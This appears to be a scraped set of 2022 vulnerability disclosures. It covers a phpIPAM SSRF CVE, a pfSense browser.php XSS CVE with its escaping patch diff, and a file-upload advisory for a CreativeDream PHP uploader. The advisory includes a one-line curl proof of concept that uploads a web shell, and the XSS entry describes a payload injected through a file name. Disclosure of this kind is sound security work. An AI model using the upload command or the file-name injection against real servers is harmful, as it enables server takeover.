        $result\['error\_msg'\] = $e\->getMessage();
    }

    return $result;
}

The developers were informed of the report by sending an email on 19/06/2022.

CVE-2022-41443: Header injection (SSRF) vulnerability in phpipam

pfSense v2.5.2 was discovered to contain a cross-site scripting (XSS) vulnerability in the browser.php component. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into a file name.

@@ -148,7 +148,7 @@ function get\_content($dir) {

?>

<tr\>

<td\></td\>

<td class\="fbFile vexpl text-left" id\="<?=$fqpn;?>"\>

<td class\="fbFile vexpl text-left" id\="<?=htmlspecialchars($fqpn);?>"\>

<?php $filename = htmlspecialchars(addslashes(str\_replace("//","/", "{$path}/{$file}"))); ?>

<div onClick\="$('#fbTarget').val('<?=$filename?>'); loadFile(); $('#fbBrowser').fadeOut();"\>

<img src\="/vendor/filebrowser/images/file\_<?=$type;?>.gif" alt\="" title\=""\>

CVE-2022-42247: Encode path+fn in browser.php. Fixes #13262 · pfsense/pfsense@73ca674

Arbitrary file upload vulnerability in php uploader

Advisory #: 216

**Title:** CreativeDream software arbitrary file upload

**Author:** Larry W. Cashdollar

**Date:** 2022-09-08

**CVE-ID:**\[CVE-2022-40721\]

**CWE:**

**Download Site:** https://github.com/CreativeDream

**Vendor:** CreativeDream

**Vendor Notified:** 2020-02-19

**Vendor Contact:** yuliangagarin@mail.ru

**Advisory:** http://www.vapidlabs.com/advisory.php?v=216

**Description:** PHP File Uploader is an easy to use, hi-performance File Upload Script which allows you to upload/download files to webserver.

**Vulnerability:**

The software allows executable file uploads to the web root directory.

**Export:** JSON TEXT XML

**Exploit Code:**

1.  curl \-vk http://localhost/php-uploader/examples/upload.php -F "files=@shell.php"
    

**Screen Shots:**

**Notes:**

Tag

#php